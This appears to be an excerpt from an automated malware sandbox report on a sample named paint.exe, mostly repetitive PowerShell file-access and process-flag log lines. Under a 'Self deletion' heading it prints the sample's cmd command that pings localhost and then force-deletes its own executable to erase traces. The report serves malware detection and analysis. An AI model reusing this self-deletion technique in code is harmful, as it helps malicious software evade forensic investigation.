Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe""
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe""			Jump to behavior

Source: C:\Users\user\Desktop\paint.exe

Code function: 0_2_00007FF6F0BD76B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

0_2_00007FF6F0BD76B0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
